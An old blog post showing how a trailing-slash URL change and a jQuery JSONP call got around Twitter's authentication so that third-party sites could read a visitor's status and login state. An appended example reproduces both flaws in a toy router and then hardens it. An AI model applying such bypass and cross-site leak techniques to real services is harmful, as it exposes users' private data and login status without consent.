Twitter "protects" API user status call… but doesn't

John Resig alerting about the authentication change

UPDATE 2/24/09: Twitter has changed their API and this technique no longer works.

For the last week or so, there’s been a lot of commentary about how you could detect if a Twitter user was visiting your site based on the response of a public, non-authenticated API call. It was documented at Ajaxian.

John Resig was one of the first to notice earlier today that Twitter has placed the API call in question behind HTTP authentication. Indeed, the link he provides to Venture Hacks issues a login alert when you visit the page.

However, this does absolutely nothing to prevent a third party from still accessing this information. Twitter is likely to fix this soon, but here’s how to use it in the meantime.

Basically, the API URL that is now issuing the authentication requirement was this:

http://twitter.com/statuses/user_timeline.json&count=1&hasTwitter&suppress_response_codes


By simply changing the path and query string slightly, you bypass authentication and retrieve the user’s status data again if they are logged in. This works without the “/?callback=” part, but that part is needed to have Twitter wrap the JSON object so that it can be used in the browser, à la JSONP.

http://twitter.com/statuses/user_timeline/?callback=usrobj


If you use jQuery, the simple bit of code that returns this is:

$.ajax({
    dataType: 'jsonp',                               // load via <script>, not XHR, so the cross-domain call works
    data: '',
    jsonp: 'callback',                               // name of the query parameter Twitter wraps the response with
    url: 'http://twitter.com/statuses/user_timeline/',
    success: function(jsondata) {
        // toSource() in the original is Firefox-only; JSON.stringify works in every browser with a JSON object
        alert(JSON.stringify(jsondata));
    }                                                // no trailing comma: IE throws a syntax error on one here
});


To use this to determine if a visitor is logged into Twitter or not, use the methods described in the Ajaxian article and just change the link. Happy hacking!
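As an added example that is not code from the original post or from Twitter, the following toy API router reproduces the two server-side defects the post relies on, side by side with a hardened version. The first defect is an authentication check keyed on one exact spelling of the URL (`/statuses/user_timeline.json`), so the trailing-slash spelling of the same resource skips it; the second is wrapping cookie-authenticated data in a caller-chosen callback, which lets any page load it with a `<script>` tag and read it. The hardened router resolves the path to its resource before checking anything, ignores cookies for the API and accepts only an explicit `Authorization` header (which a cross-site `<script>` load cannot attach, so every such load gets the same 401 regardless of login state), and restricts the callback name to a plain identifier. All session ids, tokens, status data and the `SESSIONS`, `API_TOKENS`, `vulnerableHandler` and `hardenedHandler` names are constructed for the illustration.

```javascript
// Added example, not code from the original post or from Twitter.
// Every session, token and status below is constructed for illustration.

const SESSIONS = { 'sess-abc123': { screen_name: 'alice' } };   // browser cookie -> user
const API_TOKENS = { 'tok-xyz': { screen_name: 'alice' } };     // explicit credential -> user

function latestStatus(user) {
  return [{ user: { screen_name: user.screen_name }, text: 'hello world' }];
}

// Split a URL into path + query map, and the Cookie header into a map.
function parseRequest(rawUrl, headers) {
  const [path, queryPart = ''] = rawUrl.split('?');
  const query = {};
  for (const pair of queryPart.split('&')) {
    if (!pair) continue;
    const [k, v = ''] = pair.split('=');
    query[decodeURIComponent(k)] = decodeURIComponent(v);
  }
  const cookies = {};
  for (const c of (headers.cookie || '').split(';')) {
    const [k, v] = c.trim().split('=');
    if (k) cookies[k] = v;
  }
  return { path, query, cookies };
}

// User named by an explicit "Authorization: Bearer <token>" header, or null.
function tokenUser(headers) {
  const m = /^Bearer (\S+)$/.exec(headers.authorization || '');
  return m ? API_TOKENS[m[1]] || null : null;
}

// Vulnerable: explicit auth is demanded only for one exact path string;
// any other spelling falls through to the session cookie, and ?callback=
// wraps the result so a foreign page's <script> tag can read it.
function vulnerableHandler(rawUrl, headers) {
  const req = parseRequest(rawUrl, headers);
  const explicit = tokenUser(headers);
  if (req.path === '/statuses/user_timeline.json' && !explicit) {
    return { status: 401, body: 'Basic auth required' };
  }
  const user = explicit || SESSIONS[req.cookies.session] || null;
  if (!user) return { status: 401, body: 'not logged in' };
  const json = JSON.stringify(latestStatus(user));
  return { status: 200, body: req.query.callback ? `${req.query.callback}(${json})` : json };
}

// Hardened: trailing slash and format extension are presentation, not identity,
// so normalise to the resource before any rule is applied.
function resolveResource(path) {
  return path.replace(/\/+$/, '').replace(/\.(json|xml)$/, '');
}

const CALLBACK_NAME = /^[A-Za-z_$][\w$]*$/;   // plain identifier only, no "alert(1);" style payloads

function hardenedHandler(rawUrl, headers) {
  const req = parseRequest(rawUrl, headers);
  if (resolveResource(req.path) !== '/statuses/user_timeline') {
    return { status: 404, body: 'not found' };
  }
  const user = tokenUser(headers);          // cookies deliberately never consulted for the API
  if (!user) return { status: 401, body: 'authentication required' };
  if (req.query.callback !== undefined && !CALLBACK_NAME.test(req.query.callback)) {
    return { status: 400, body: 'invalid callback name' };
  }
  const json = JSON.stringify(latestStatus(user));
  return { status: 200, body: req.query.callback ? `${req.query.callback}(${json})` : json };
}

// Usage: a foreign page's <script src=...> can send the visitor's cookie but no headers.
const crossSite = { cookie: 'session=sess-abc123' };
console.log(vulnerableHandler('/statuses/user_timeline.json', crossSite).status);          // 401, protected spelling
console.log(vulnerableHandler('/statuses/user_timeline/?callback=usrobj', crossSite).body); // usrobj([...]) leaks
console.log(hardenedHandler('/statuses/user_timeline/?callback=usrobj', crossSite).status); // 401, same for every visitor
```

The point of the hardened handler is that the decision no longer depends on anything the browser sends automatically: with cookies out of the picture, a logged-in and a logged-out visitor produce byte-identical 401 responses from a cross-site load, so neither the body nor the script tag's load/error events reveal login state.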
